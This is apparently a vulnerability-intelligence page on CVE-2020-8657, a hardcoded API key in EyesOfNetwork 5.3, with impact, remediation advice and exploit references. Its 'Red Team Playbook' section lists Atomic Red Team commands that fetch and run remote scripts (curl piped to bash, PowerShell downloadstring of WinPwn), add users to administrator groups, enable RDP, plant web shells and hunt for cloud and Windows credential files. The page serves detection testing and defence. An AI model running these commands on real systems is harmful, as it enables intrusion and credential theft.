CVE-2020-8657
Overview
This vulnerability is an authentication bypass caused by the use of a hardcoded API key within the EyesOfNetwork 5.3 installation. The key, defined as EONAPI_KEY in the include/api_functions.php file for API version 2.4.2, is identical across all deployments. This uniformity enables attackers to derive administrative access tokens by calculating or guessing based on the static key, impacting the API authentication mechanism.
Vulnerability Description
An issue was discovered in EyesOfNetwork 5.3. The installation uses the same API key (hardcoded as EONAPI_KEY in include/api_functions.php for API version 2.4.2) by default for all installations, hence allowing an attacker to calculate/guess the admin access token.
Impact
An unauthenticated attacker can exploit this flaw to create administrative users within the EyesOfNetwork management system. This results in unauthorized full administrative access, enabling control over monitoring configurations and potentially sensitive operational data. No prior authentication or user interaction is required, allowing remote compromise of the affected system. Such access can lead to data breaches, manipulation of monitoring infrastructure, and disruption of network management operations.
Solution
Users of EyesOfNetwork version 5.3 should upgrade to a version where the hardcoded API key is replaced with unique, per-installation keys. Refer to the EyesOfNetwork community advisories and the GitHub issue #17 for patch details and configuration changes. The official Nuclei template repository and Exploit-DB references provide additional context for mitigation steps. Applying these updates eliminates the default shared API key and enforces proper authentication mechanisms.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in EyesOfNetwork version 5.3 arises from the use of a hardcoded API key, specifically designated as EONAPI_KEY, within the installation's codebase. This key is embedded in the file include/api_functions.php, and its default configuration is uniform across all installations. Such a design flaw presents a significant security risk, as it allows potential attackers to easily deduce or guess the admin access token associated with the API. The predictable nature of the key, coupled with its widespread availability, means that any instance of the software is susceptible to unauthorized access if the attacker can exploit this weakness.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage automated tools to scan for installations of EyesOfNetwork that are publicly accessible. Once identified, they can attempt to authenticate using the hardcoded API key, thereby gaining administrative privileges without needing to breach any additional security measures. This could lead to unauthorized data access, manipulation of system settings, or even the execution of arbitrary commands on the server. In scenarios where the software is integrated with other systems or databases, the implications of such access could extend far beyond the immediate environment, potentially compromising sensitive information or disrupting critical services.
The real-world impact of this vulnerability is profound, particularly for organizations relying on EyesOfNetwork for network monitoring and management. Given the high CVSS score of 9.8, the risk associated with this flaw is categorized as critical. A successful exploitation could lead to significant business risks, including data breaches, loss of customer trust, and potential regulatory penalties if sensitive data is exposed. Furthermore, the operational integrity of the organization could be jeopardized, as attackers might manipulate network configurations or disrupt monitoring capabilities, leading to unanticipated downtime or failures in incident response.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, regular security audits and vulnerability assessments should be conducted to identify instances of the affected software within the environment. Organizations should also monitor their network traffic for unusual patterns that may indicate unauthorized access attempts. In terms of mitigation, it is crucial to update to a patched version of EyesOfNetwork that addresses this hardcoded API key issue. Additionally, employing best practices such as changing default credentials, implementing strong authentication mechanisms, and utilizing API gateways can significantly reduce the attack surface. Educating staff about the importance of security hygiene and the risks associated with hardcoded secrets is also vital in fostering a culture of security awareness.
In conclusion, the hardcoded API key vulnerability in EyesOfNetwork 5.3 exemplifies a critical security flaw that can have severe implications for affected organizations. The ease of exploitation and the potential for significant business impact underscore the importance of proactive security measures. By adopting comprehensive detection and mitigation strategies, organizations can safeguard their systems against such vulnerabilities, ensuring the integrity and confidentiality of their operations in an increasingly threat-laden digital landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the EyesOfNetwork 5.3 vulnerability associated with the hardcoded API key (CVE-2020-8657). This increase is reflected in a rising EPSS score and a sharp uptick in telemetry signals, indicating that threat actors are actively leveraging available exploit modules, including Metasploit frameworks that facilitate remote command execution and privilege escalation. The evolving exploit landscape, characterized by authentication bypass techniques and combined SQL injection vectors, significantly lowers the barrier for attackers to gain administrative control. This development amplifies the risk posture for organizations running vulnerable EyesOfNetwork instances, as it suggests a growing likelihood of successful intrusions that could lead to full system compromise. Consequently, the threat level has escalated from a theoretical concern to a more imminent operational risk, necessitating heightened vigilance in detection and response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Eyesofnetwork | Eyesofnetwork | 5.3-0 |
cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
exploits/linux/http/eyesofnetwork_autodiscovery_rce
|
Clément Billac, bcoles, Erik Wynter | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit) | Metasploit | remote | multiple | - | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-191 | Read Sensitive Constants Within an Executable |
38%
|
— | Low | |
| CAPEC-70 | Try Common or Default Usernames and Passwords |
31%
|
Medium | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-8657 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/EyesOfNetworkCommunity/eonapi/issues/17 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8657 |